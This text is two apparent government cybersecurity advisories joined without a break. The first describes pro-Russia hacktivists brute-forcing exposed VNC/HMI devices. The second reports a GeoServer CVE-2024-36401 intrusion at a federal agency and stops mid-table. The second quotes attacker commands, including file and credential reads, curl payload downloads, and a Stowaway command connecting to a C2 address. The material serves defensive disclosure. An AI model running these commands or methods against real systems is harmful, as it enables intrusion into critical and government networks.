Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 18. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

TTP Overview

Pro-Russia hacktivist groups employ easily disseminated and replicated TTPs across various entities, increasing the likelihood of widespread adoption and escalating the frequency of intrusions. These groups have limited capabilities, frequently misunderstanding the processes they aim to disrupt. Their apparent low level of technical knowledge results in haphazard attacks where actors intend to cause physical damage but cannot accurately anticipate actual impact. Despite these limitations, the authoring organizations have observed these groups willfully cause actual harm to vulnerable critical infrastructure.

Pro-Russia hacktivist groups use the TTPs in this Cybersecurity Advisory to target virtual network computing (VNC)-connected HMI devices. These groups are primarily seeking notoriety with their actions. While they have caused damage in some instances, they regularly make false or exaggerated claims about their attacks on critical infrastructure to garner more attention. They frequently misrepresent their capabilities and the impacts of their actions, portraying minor incursions as significant breaches, but such incursions can still lead to lost time and resources for operators remediating systems.

Additionally, pro-Russia hacktivists use an opportunistic targeting methodology. They leverage superficial criteria, such as victim availability and existing vulnerabilities, rather than focusing on strategically significant entities. Their lack of strategic focus can lead to a broad array of targets, ranging from water treatment facilities to oil well systems. Pro-Russia hacktivists have demonstrated a pattern of frequently taking advantage of the widespread availability of vulnerable VNC connections. While system owners typically use VNC connections for legitimate remote system access functions, threat actors can maliciously use these connections to broadly target numerous platforms and services. Consequently, these groups can indiscriminately compromise critical infrastructure entities, including those in the Water and Wastewater, Food and Agriculture, and Energy Sectors.

Pro-Russia hacktivist groups have successfully targeted supervisory control and data acquisition (SCADA) networks using basic methods, and in some cases, performed simultaneous DDoS attacks against targeted networks to facilitate SCADA intrusions. As recently as April 2025, threat actors used the following unsophisticated TTPs to access networks and conduct SCADA intrusions:

  • Scan for vulnerable devices on the internet [T0883] with open VNC ports [T1595.002].
  • Initiate temporary virtual private server (VPS) [T1583.003] to execute password brute force software.
  • Use VNC software to access hosts [T1021.005].
  • Confirm connection to the vulnerable device [T0886].
  • Brute force the password, if required [T1110.003].
  • Gain access to HMI devices [T0883], typically with default [T0812], weak, or no passwords [T0859].
  • Log the confirmed vulnerable device IP address, port, and password.
  • Using the HMI graphical interface [T0823], capture screen recordings or intermittent screenshots while conducting the following actions, intending to affect productivity and cause additional costs [T0828]:
    • Modify usernames/passwords [T0892];
    • Modify parameters [T0836];
    • Modify device name [T0892];
    • Modify instrument settings [T0831];
    • Disable alarms [T0878];
    • Create loss of view (a technique that mandates local hands-on operator intervention) [T0829]; and/or
    • Device restart or shutdown [T0816].
  • Disconnect from the device, ending the VNC connection.
  • Research the compromised device company after the intrusion [T1591].

Propagation

To reach a wider audience, pro-Russia hacktivist groups work together, amplify each other’s posts, create additional groups to amplify their own posts, and likely share TTPs. For example, Z-Pentest jointly claimed intrusion of a U.S. system with Sector16. Sector16 later began posting additional intrusions for which the group claimed sole responsibility. It is likely that these and similar groups will continue to iterate and share these methods to disrupt critical infrastructure organizations.

Reconnaissance and Initial Access

The threat actors’ intrusion methodology is relatively unsophisticated, inexpensive to execute, and easy to replicate. These pro-Russia hacktivist groups abuse popular internet-scraping tools, such as Nmap or OPENVAS, to search for visible VNC services and use brute force password spraying tools to access devices via known default or otherwise weak credentials. Threat actors typically search for these services on the default port 5900 or other nearby ports (5901-5910). Their goal is to gain remote access to HMI devices connected to live control networks.

Once threat actors obtain access, they manipulate available settings from the graphical user interface (GUI) on the HMI devices, such as arbitrary physical parameter and setpoint changes, or conduct defacement activities. Because pro-Russia hacktivist groups seem to lack sector-specific expertise or cyber-physical engineering knowledge, they currently cannot reliably estimate the true impact of their actions. Regardless of outcome, pro-Russia hacktivist groups often post images and screen recordings to their social media platforms, boasting the compromises and exaggerating impacts to garner attention from their peers and the media.

Impact

While pro-Russia hacktivist groups currently demonstrate limited ability to consistently cause significant impact, there is a risk that their continued attacks will result in further harm or grievous physical consequences. Attacks have not yet caused injury; however, the attacks against occupied factories and community facilities demonstrate a lack of consideration for human safety.

Victim organizations reported that the most common operational impact caused by these threat actors is a temporary loss of view, necessitating manual intervention to manage processes. However, any modifications to programmatic and systematic procedures can result in damage or disruption, including substantial labor costs from hiring a programmable logic controller programmer to restore operations, costs associated with operational downtime, and potential costs for network remediation.

MITRE ATT&CK Tactics and Techniques

See Table 1 to Table 10 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 1. Reconnaissance
Technique Title ID Use
Gather Victim Organization Information T1591 Threat actors use information available on the internet to determine what systems they believe they have compromised and post the information on their social media. This methodology frequently leads to the threat actors misidentifying their claimed victims.
Active Scanning: Vulnerability Scanning T1595.002 Threat actors use open source tools to look for IP addresses in target countries with visible VNC services on common ports.
Table 2. Resource Development
Technique Title ID Use
Acquire Infrastructure: Virtual Private Server T1583.003 Threat actors use virtual infrastructure to obfuscate identifiers.
Table 3. Initial Access
Technique Title ID Use
Internet Accessible Device T0883 Threat actors gain access through less secure HMI devices exposed to the internet.
Table 4. Persistence
Technique Title ID Use
Valid Accounts T0859 Threat actors use password guessing tools to access legitimate accounts on the HMI devices.
Table 5. Credential Access
Technique Title ID Use
Brute Force: Password Spraying T1110.003 Threat actors use tools to rapidly guess common or simple passwords.
Table 6. Lateral Movement
Technique Title ID Use
Default Credentials T0812 Threat actors seek and build libraries of known default passwords for control devices to access legitimate user accounts.
Remote Services T0886 Threat actors leverage VNC services to access system HMI devices.
Remote Services: VNC T1021.005 Threat actors hunt VNC-enabled devices visible on the internet and connect with remote viewer software.
Table 7. Execution
Technique Title ID Use
Graphical User Interface T0823 Threat actors interact with HMI devices via GUIs, attempting to modify control devices.
Table 8. Inhibit Response Function
Technique Title ID Use
Device Restart/Shutdown T0816 While threat actors claim to turn off HMIs, it is possible that operators (not the threat actors) turn the devices off during incident response.
Alarm Suppression T0878 Threat actors use HMI interfaces to clear alarms caused by their activity and alarms already present on the system at the time of their intrusion.
Change Credential T0892 Threat actors change the usernames and passwords of HMI devices in operator lockout attempts, usually resulting in a loss of view and operators switching to manual operations.
Table 9. Impair Process Control
Technique Title ID Use
Modify Parameter T0836 Threat actors attempt to change upper and lower limits of operational devices as available from the HMI.
Unauthorized Command Message T0855 Threat actors attempt to send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, causing possible impact.
Table 10. Impact
Technique Title ID Use
Loss of Productivity and Revenue T0828 Threat actors purposefully attempt to impact productivity and create additional costs for the affected entities.
Loss of View T0829 Threat actors change credentials on HMI devices, preventing operators from modifying processes remotely. 
Manipulation of Control T0831 Threat actors change setpoints in processes, impacting the efficiency of operations for those specific processes.  

Incident Response

If organizations find exposed systems with weak or default passwords, they should assume threat actors compromised the system and begin the following incident response protocols:

  1. Determine which hosts were compromised and isolate them by quarantining or taking them offline.
  2. Initiate threat hunting activities to scope the intrusion. Collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.
  3. Reimage compromised hosts.
  4. Provision new account credentials.
  5. Report the compromise to CISA, FBI, and/or NSA. See the Contact Information section of this advisory.
  6. Harden the network to prevent additional malicious activity. See the Mitigations section of this advisory for guidance.

Mitigations

OT Asset Owners and Operators

The authoring organizations recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.

  • Reduce exposure of OT assets to the public-facing internet. When connected to the internet, OT devices are easy targets for malicious cyber threat actors. Many devices can be found by searching for open ports on public IP ranges with search engine tools to target victims with OT components [CPG 3.S].
    • Asset owners should use attack surface management services and web-based search platforms to scan the internet. This mitigation can help identify if there are VNC systems exposed within the IP ranges they own, especially for connections set up by third parties.
      Note: For more information on attack surface management, see CISA’s Internet Exposure Reduction Guidance, CISA’s Cyber Hygiene Services for U.S. critical infrastructure, and NSA’s Attack Surface Management for the U.S. Defense Industrial Base.
    • Implement network segmentation between IT and OT networks. Segmenting critical systems and introducing a demilitarized zone (DMZ) for passing control data to enterprise logistics reduces the potential impact of cyber threats and the risk of disruptions to essential OT operations [CPG 3.I].
    • Consider implementing a firewall and/or virtual private network if exposure to the internet is necessary for controlling access to devices.
      • Consider disabling public exposure by default and implementing time-limited remote access to reduce the amount of time systems are exposed.
      • Restrict and monitor both inbound and outbound traffic at OT perimeter firewalls. Configure OT perimeter firewalls to enforce a default-deny policy for all traffic. Asset owners should explicitly permit authorized destinations and protocols based on operational requirements.
      • Implement strict egress filtering to prevent unauthorized data exfiltration or command-and-control callbacks.
      • Regularly audit firewall rulesets and monitor outbound traffic patterns for anomalies indicative of threat actor activity, such as beaconing or unexpected protocol usage.
  • Adopt mature asset management processes, including mapping data flows and access points. Generating a complete picture of both OT and IT assets provides visibility to operators and management, allowing organizations to monitor and assess deviations for criticality [CPG 2.A].
    • Keep remote access services updated with the latest version available and ensure all systems and software are up to date with patches and necessary security updates.
      • Keep VNC systems updated with the latest version available.
    • Refer to the joint Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators to help with reducing cybersecurity risk by identifying which assets within their environment should be secured and protected.
  • Ensure OT assets use robust authentication procedures.
    • Many devices lack robust authentication and authorization. Devices with weak authentication are vulnerable targets to threat actors using credential theft techniques.
    • Implement MFA where possible. Where MFA is not feasible, use strong, unique passwords. Apply password standards for operator-accessible services on underlying OT assets, as well as network devices protecting those services. This is especially important for services that require internet accessibility [CPG 3.A] [CPG 3.B] [CPG 3.C] [CPG 3.F].
    • Establish an allowlist that permits only authorized device IP addresses and/or media access control addresses. The allowlist can be refined to operator working hours to further obstruct malicious threat actor activity; organizations are encouraged to establish monitoring and alerting for access attempts not meeting these criteria [CPG 3.E].
    • Disable any unused authentication methods, logic, or features, such as default authentication keys and default passwords. Block all unused high ephemeral ports and monitor for attempted connections using standard protocols on non-standard ports [CPG 3.R].
    • Authenticate all access to field controllers before authorizing access to, or modification of, a device’s state, logic, program, or filesystems.
  • Enable control system security features that can separate and audit view and control functions. Limiting remotely accessible or default user accounts to “view-only” removes the potential for impact without exploiting a vulnerability [CPG 3.G].
  • Implement and practice business recovery/disaster recovery plans. Plans should also take into consideration redundancy, fail-safe mechanisms, islanding capabilities, backup restoration, and manual operation.
    • Include scenarios that necessitate switching to manual operations. Maintaining the capability of an organization to revert to manual controls to quickly restore operations is vital in the immediate aftermath of a cyber incident [CPG 6.A].
    • Create backups of the engineering logic, configurations, and firmware of HMIs to enable fast recovery. Organizations should routinely test backups and standby systems to ensure safe manual operations in the event of an incident [CPG 3.O].
  • Collect and monitor the traffic of OT assets and networking devices. This includes unusual logins or unexpected protocols communicating over the internet, and functions of ICS management protocols that change an asset’s operating mode or modify programs.
  • Review configurations for setpoint ranges or tag values to stay within safe ranges and establish alerting for deviations.
  • Take a proactive approach in the procurement process by following the guidance outlined in the joint guide Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products.

OT Device Manufacturers

Although critical infrastructure organizations can take steps to mitigate risks, it is ultimately the responsibility of OT device manufacturers to build products that are secure by design. The authoring organizations urge device manufacturers to take ownership of the security outcomes of their customers in line with the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software.

  • Eliminate default credentials and require strong passwords. The use of default credentials is a top weakness threat actors exploit to gain access to systems.
  • Mandate MFA for privileged users. Changes to engineering logic or configurations are safety-impacting events in critical infrastructure. MFA should be available for safety critical components at no additional cost.
  • Practice secure by default principles. OT components were initially designed without public internet connectivity in mind. When internet connection becomes necessary, implementing additional security measures is essential to safeguard these systems. Manufacturers should recognize insecure states and promptly inform users so they can make informed risk decisions.
    • Include logging at no additional charge. Change and access control logs allow operators to track safety-impacting events in their critical infrastructure. These logs should be available for no cost and use open standard logging formats.
  • Publish Software Bill of Materials (SBOMs). Vulnerabilities in underlying software libraries can affect a wide range of devices. Without an SBOM, it is nearly impossible for a critical infrastructure system owner to measure and mitigate the impact of a vulnerability on their existing systems. See CISA’s SBOM webpage for more information.

Additionally, see CISA’s Secure by Design Alert on how software manufacturers can shield web management interfaces from malicious cyber activity. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates.

For more information on secure by design, see CISA’s Secure by Design webpage.

Validate Security Controls

In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how it performs against the ATT&CK techniques described in this advisory.

To start:

  1. Select an ATT&CK technique described in this advisory (see Table 1 to Table 10).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Resources

Entities requiring additional support for implementing any of the mitigations in this advisory should contact their regional CISA Cybersecurity Advisor for assistance. Key resources organizations should reference include:

Additional resources that apply to this advisory include:

Contact Information

U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, FBI, and/or NSA:

  • Contact CISA via CISA’s 24/7 Operations Center at contact@cisa.dhs.gov or 1-844-Say-CISA (1-844-729-2472) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
  • For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov.

Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.

Canadian organizations: Report incidents by emailing Cyber Centre at contact@cyber.gc.ca.

New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.

United Kingdom organizations: Report a significant cyber security incident: report.ncsc.gov.uk (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and co-sealers.

Acknowledgements

Schneider Electric, Nozomi Networks, Eversource Energy, Electricity Information Sharing and Analysis Center, Chevron, BP, and Dragos contributed to this advisory.

Version History

December 09, 2025: Initial version.

Appendix A: Targeting Methodologies for Pro-Russia Hacktivist Groups

For further information on targeting methodologies for pro-Russia hacktivist groups, see:

Appendix B: Additional Designators Used for Cited Groups

The cybersecurity industry and cyber actor groups often use various names to reference actor groups. While not exhaustive, the following are the most notable names used within the cybersecurity community to reference the groups in this advisory.

Note: Cybersecurity organizations have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the authoring organizations’ understanding for all activity related to these groupings.

  • GRU military unit 74455
    • Sandworm Team
    • Voodoo Bear
    • Seashell Blizzard
    • APT44
  • Cyber Army of Russia Reborn (CARR)
    • CyberArmy of Russia
    • Народная CyberАрмия (НКА)
    • People’s CyberArmy of Russia (PCA)
    • Russian CyberArmy Team (RCAT)
  • NoName057(16)
    • NoName057(16) Spain
    • NoName057(16) Italy
    • NoName057(16) France
  • Z-Pentest
    • Z-Pentest Beograd
    • Z-Pentest Alliance
    • Z-Alliance
  •  

CISA Shares Lessons Learned from an Incident Response Engagement

Advisory at a Glance

Executive Summary CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate risk, prepare for, and respond to incidents: vulnerabilities were not promptly remediated, the agency did not test or exercise their incident response plan (IRP), and EDR alerts were not continuously reviewed.
Key Actions
  • Prevent compromise by prioritizing the patching of critical vulnerabilities in public-facing systems and known exploited vulnerabilities.
  • Prepare for incidents by maintaining, practicing, and updating incident response plans.
  • Prepare for incidents by implementing comprehensive and verbose logging and aggregate logs in a centralized out-of-band location.
Indicators of Compromise 

For a downloadable copy of indicators of compromise, see: 

Intended Audience

Organizations: FCEB agencies and critical infrastructure organizations.

Roles: Defensive Cybersecurity Analysts, Vulnerability Analysts, Security Systems Managers, Systems Security Analysts, and Cybersecurity Policy and Planning Professionals.

Download the PDF version of this report AA25-266A advisory cisa shares lessons learned from ir engagement

Introduction

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to highlight lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency. CISA is publicizing this advisory to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and aggregating logs in a centralized out-of-band location. CISA is also raising awareness about the tactics, techniques, and procedures (TTPs) employed by these cyber threat actors to help organizations safeguard against similar exploits.

CISA began incident response efforts at an FCEB agency after the agency identified potential malicious activity through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA discovered cyber threat actors compromised the agency by exploiting CVE-2024-36401 in a GeoServer about three weeks prior to the EDR alerts. Over the three-week period, the cyber threat actors gained separate initial access to a second GeoServer via the same vulnerability and moved laterally to two other servers.

Leveraging insights CISA gleaned from the organization’s security posture and response, CISA is sharing lessons learned for organizations to mitigate similar compromises (see Lessons Learned for more details):

  1. Vulnerabilities were not promptly remediated.
    1. The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers.
    2. The vulnerability was disclosed 11 days prior to the cyber threat actors accessing the first GeoServer and 25 days prior to them accessing the second GeoServer.
  2. The agency did not test or exercise their incident response plan (IRP), nor did their IRP enable them to promptly engage third parties and grant third parties access to necessary resources.
    1. This delayed certain elements of CISA’s response as the IRP did not have procedures for involving third-party assistance or for granting third-party access to their security tools.
  3. EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection.
    1. The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity earlier as they did not observe an alert from a GeoServer and the Web Server did not have endpoint protection.

These lessons highlight strategies to effectively mitigate risk, enhance preparedness, and respond to incidents with greater efficiency. CISA encourages all organizations to consider the lessons learned and apply the associated recommendations in the Mitigations section of this advisory to improve their security posture.

This advisory also provides the cyber threat actors’ TTPs and indicators of compromise (IOCs). For a downloadable copy of IOCs, see:

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Threat Actor Activity

CISA responded to a suspected compromise of a large FCEB agency after the agency’s security operations center (SOC) observed multiple endpoint security alerts.

During the incident response, CISA discovered that cyber threat actors gained access to the agency’s network on July 11, 2024, by exploiting GeoServer vulnerability CVE 2024-36401 [CWE-95: “Eval Injection”] on a public-facing GeoServer (GeoServer 1). This critical vulnerability, disclosed June 30, 2024, allows unauthenticated users to gain remote code execution (RCE) on affected GeoServer versions [1]. The cyber threat actors used this vulnerability to download open source tools and scripts and establish persistence in the agency’s network. (CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog on July 15, 2024.)

After gaining initial access to GeoServer 1, the cyber threat actors gained separate initial access to a second GeoServer (GeoServer 2) on July 24, 2024, by exploiting the same vulnerability. They moved laterally from GeoServer 1 to a web server (Web Server) and then a Structured Query Language (SQL) server. On each server, they uploaded (or attempted to upload) web shells such as China Chopper, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used living off the land (LOTL) techniques.

See Figure 1 for an overview of the cyber threat actors’ activity and the following sections for detailed threat actors TTPs.

Figure 1. Overview of Threat Actor Activity

Image outlining threat actor activity

Reconnaissance

The cyber threat actors identified CVE-2024-36401 in the organization’s public-facing GeoServer using Burp Suite Burp Scanner [T1595.002]. CISA detected this scanning activity by analyzing web logs and identifying signatures associated with the tool. Specifically, CISA observed domains linked to Burp Collaborator—a component of Burp Suite used for vulnerability detection—originating from the same IP address the cyber threat actors later used to exploit the GeoServer vulnerability for initial access.

Resource Development

The cyber threat actors used publicly available tools to conduct their malicious operations. In one instance, they gained remote access to the organization’s network and leveraged a commercially available virtual private server (VPS) from a cloud infrastructure provider [T1583.003].

Initial Access

To gain initial access to GeoServer 1 and GeoServer 2, the cyber threat actors exploited CVE 2024-36401 [T1190]. They leveraged this vulnerability to gain RCE by performing “eval injection,” a type of code injection that allows an untrusted user’s input to be evaluated as code. The cyber threat actors likely attempted to load a JavaScript extension to gain webserver information as an Apache wicket on GeoServer 1. However, their efforts were likely unsuccessful, as CISA observed attempts to access the .js file returning 404 responses in the web logs, indicating that the server could not find the requested URL.

Persistence

The cyber threat actors primarily used web shells [T1505.003] on internet-facing hosts, along with cron jobs (scheduled commands that run automatically at specified times) [T1053.003], and valid accounts [T1078] for persistence. CISA also identified the creation of accounts—although these accounts were later deleted—with no evidence indicating further use.

Privilege Escalation

The cyber threat actors attempted to escalate privileges with the publicly available dirtycow tool [2], which can be used to exploit CVE-2016-5195 [CWE-362: “Race Condition”] [T1068]. After compromising web service accounts, they escalated their local privileges to transition away from these service accounts (it is unknown how they escalated privileges).

Note: CVE-2016-5195 affects Linux kernel 2.x through 4.x before 4.8.3 and allows users to escalate privileges. CISA added this CVE to its KEV Catalog on March 3, 2022.

Defense Evasion

To evade detection, the cyber threat actors employed indirect command execution via .php web shells and xp_cmdshell [T1202] and abused Background Intelligence Transfer Service (BITS) jobs [T1197]. CISA also observed files on GeoServer 1 named RinqQ.exe and RingQ.rar, which likely refer to a publicly available defense evasion tool called RingQ [3], that the cyber threat actors staged for potential use.

Note: CISA could not recover most of the files on the host to confirm their contents.

Credential Access

Once inside the organization’s network, the cyber threat actors primarily relied on brute force techniques [T1110] to obtain passwords for lateral movement and privilege escalation. They also accessed service accounts by exploiting their associated services.

Discovery

After gaining initial access, the cyber threat actors conducted discovery to facilitate lateral movement. They performed ping sweeps of hosts within specific subnets [T1018] and downloaded the fscan tool [4] to scan the organization’s network. CISA identified the use of the fscan tool by analyzing evidence of its output found on disk. (Note: fscan is publicly available on GitHub and is capable of port scanning, fingerprinting, and web vulnerability detection—among other functions.) Between July 15 and 31, 2024, the cyber threat actors conducted extensive network and vulnerability scanning using fscan and linux-exploit-suggester2.pl. CISA’s host forensics analysts uncovered this activity by reviewing remnants the cyber threat actors left on disk.

GeoServer 1

The cyber threat actors leveraged CVE-2024-36401 to execute the following host discovery commands on GeoServer 1:

  • uname-a
  • df-h
  • env
  • ps -aux
  • ipconfig [T1016]
  • date
  • who -b
  • rpm -qa polkit
  • netstat -ano [T1049]

Additionally, they employed LOTL techniques for user, service, filesystem, and network discovery on GeoServer 1:

  • cat /etc/passwd [T1087.001]
  • cat /etc/resolv.conf
  • cat /usr/local/apache-tomcat-9.0.89/webapps/geoserver/WEB-INF/web.xml
  • cat /etc/redhat-release [T1082]
  • cat /etc/os-release 

The cyber threat actors then used curl commands to download a shell script named mm.sh (which they renamed to aa.sh) and a zip file named aaa.zip to the /tmp/ directory.

Subsequently, they enumerated the internal network from GeoServer 1, identifying Secure Shell (SSH) listeners, File Transfer Protocol (FTP) servers, file servers, and web servers [T1046] by using the fscan tool. (Note: CISA observed endpoint logs that showed the cyber threat actors uploaded fscan to the compromised host and ran it against internal systems.) The actors then attempted to brute force login credentials for the exploited web services to gain remote access, achieve RCE, or move laterally.

The cyber threat actors also conducted ping sweeps of several hosts within the organization’s internal subnets using fscan. Their use of the -nobr and -nopoc flags for fscan indicated that this scan excluded brute forcing or vulnerability scanning, respectively.

SQL Server

CISA observed the following discovery commands on the organization’s SQL server:

  • whoami [T1033]
  • ipconfig /all
  • ping -n 1 8.8.8.8
  • systeminfo
  • tasklist [T1057]
  • dir c:\ [T1083]
  • dir c:\Users
  • type c:\Last.txt
  • type c:\inetpub\wwwroot
  • type c:\inetpub\
  • dir c:\inetpub\wwwroot
  • dir c:\
  • dir c:\ifwapps
  • dir d:\
  • dir e:\
  • net group "domain admins" /domain
  • type C:\Windows\System32\inetsrv\config\applicationHost.config
  • dir c:\ifwapps\Tier1Utilities
  • netstat -ano
  • curl
  • net user
  • tasklist

GeoServer 2

Based on images CISA received of GeoServer 2, CISA observed the bash history of a user that showed the use of Burp Collaborator to execute encoded host and network discovery commands.

Lateral Movement

In one instance, the cyber threat actors moved laterally from the Web Server to the SQL Server by enabling xp_cmdshell for RCE on GeoServer 1.

Command and Control

The cyber threat actors used PowerShell [T1059.001] and bitsadmin getfile to download payloads [T1105]. 

They used Stowaway [5], a publicly available multi-level proxy tool, to establish C2 [T1090]. Stowaway enabled the cyber threat actors to bypass the organization’s intranet restrictions and access internal network resources by forwarding traffic from their C2 server through the Web Server. They wrote Stowaway to disk using a tomcat service account.

The actors then executed Stowaway via /var/tmp/agent -c 45.32.22[.]62:4441 -s f86bc7ff68aff3ad –up http –reconnect 10.

To test their level of access, the cyber threat actors performed a ping sweep of multiple hosts in a particular subnet of the organization’s network. Next, the cyber threat actors downloaded a modified version of Stowaway using a curl command, successfully establishing an outbound connection with their C2 server using HTTP over TCP/4441.

On July 14, 2024, the cyber threat actors executed /tmp/mm.sh on the Web Server followed by an encoded command to execute Stowaway. The contents of this file could not be recovered. Additionally, they used Stowaway to establish a second C2 connection over TCP/50012, likely serving as a backup C2 channel.

CISA discovered evidence of various files hosted on the C2 server, including numerous publicly available tools and scripts:

  • RingQ antivirus defense evasion tool (RingQ.exe, RingQ.rar)
  • IOX proxy tool (iox.rar)
  • BusyBox trojan multi-tool (busybox)
  • WinRAR archive tool (Rar.exe)
  • Stowaway proxy tool (agent, agent.tar, agent.zip, agentu.exe)
  • Web shells (Handx.ashx, start_tomcat.jsp)
  • Various shell scripts (mm.sh, t.py, t1.sh, c.bat)

Detection

The cyber threat actors remained undetected in the organization’s environment for three weeks before the organization’s SOC identified the compromise using their EDR tool. On July 31, 2024, their EDR tool identified a 1.txt file uploaded as suspected malware on the SQL Server. The SOC responded to additional alerts when the cyber threat actors transferred 1.txt to the SQL Server through bitsadmin after attempting other LOTL techniques, such as leveraging PowerShell and certutil. The alerts generated by this activity on the SQL server prompted the SOC to contain the server, initiate an investigation, request assistance from CISA, and uncover malicious activity on GeoServer 1.

Lessons Learned

CISA is sharing the following lessons learned based on what CISA learned about the organization’s security posture through incident detection and response activities.

  1. Vulnerabilities were not promptly remediated.
    1. The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers.
    2. The vulnerability was disclosed June 30, 2024, and the cyber threat actors exploited it for initial access to GeoServer 1 on July 11, 2024.
    3. The vulnerability was added to CISA’s KEV Catalog on July 15, 2024, and by July 24, 2024, the vulnerability was not patched when the cyber threat actors exploited it for access to GeoServer 2.
      1. Note: FCEB agencies are required to remediate vulnerabilities in CISA’s KEV Catalog within prescribed timeframes under Binding Operational Directive (BOD) 22-01. July 24, 2024, was within the KEV-required patching window for this CVE. However, CISA encourages FCEB agencies and critical infrastructure organizations to address KEV catalog vulnerabilities immediately as part of their vulnerability management plan.
  2. The agency did not test or exercise their IRP, nor did their IRP enable them to promptly engage third parties and grant third parties’ access to necessary resources.
    1. On Aug. 1, 2024, upon discovering the endpoint alerts, the agency conducted remote triage of affected systems and used their EDR tool to contain the intrusion.
      1. After containment, the agency engaged CISA to investigate potential threat actor persistence in their environment.
      2. Their IRP did not have procedures for bringing in third parties for assistance, which hampered CISA’s efforts to respond to the incident quickly and efficiently.
        1. The agency could not provide CISA remote access to their security information and event management (SIEM) tool, which initially kept CISA from reviewing all available logs, hindering CISA’s analysis.
        2. The agency had to go through their change control board process before CISA could deploy their EDR agents.
        3. The agency could have proactively identified these roadblocks by testing their IRP, such as via a tabletop exercise, but had not tested their plan for a long period.
  3. EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection.
    1. The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity on July 15, 2024, as they did not observe an alert from GeoServer 1 where the EDR detected the Stowaway tool.
    2. The Web Server lacked endpoint protection.

Indicators of Compromise

See Table 1 for IOCs associated with this activity.

Disclaimer: The IP addresses in this advisory were observed in August 2024, and some may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.

Table 1. IOCs

IOC Type Date Description
45.32.22[.]62 IPv4 Mid-July to early August 2024 C2 Server IP Address
45.17.43[.]250 IPv4 Mid-July to early August 2024 C2 Server IP Address
0777EA1D01DAD6DC261A6B602205E2C8 MD5 Mid-July to early August 2024 China Chopper Web Shell
feda15d3509b210cb05eacc22485a78c MD5 Mid-July to early August 2024 Generic PHP Web Shell
C9F4C41C195B25675BFA860EB9B45945 MD5 Mid-July to early August 2024 Linux Exploit CVE-2016-5195
B7B3647E06F23B9E83D0B1CCE3E71642 MD5 Mid-July to early August 2024 Dirtycow
64e3a3458b3286caaac821c343d4b208 MD5 Mid-July to early August 2024 Stowaway Proxy Tool
20b70dac937377b6d0699a44721acd80 MD5 Mid-July to early August 2024 Unknown Downloaded Executable
de778443619f37e2224898a9a800fa78 MD5 Mid-July to early August 2024 Unknown Downloaded Executable

MITRE ATT&CK Tactics and Techniques

See Table 2 through Table 11 for all referenced threat actor tactics and techniques.

Table 2. Reconnaissance

Technique Title ID Use
Active Scanning: Vulnerability Scanning T1595.002 The cyber threat actors performed active scanning to identify vulnerabilities they could use for initial access.

Table 3. Resource Development

Technique Title ID Use
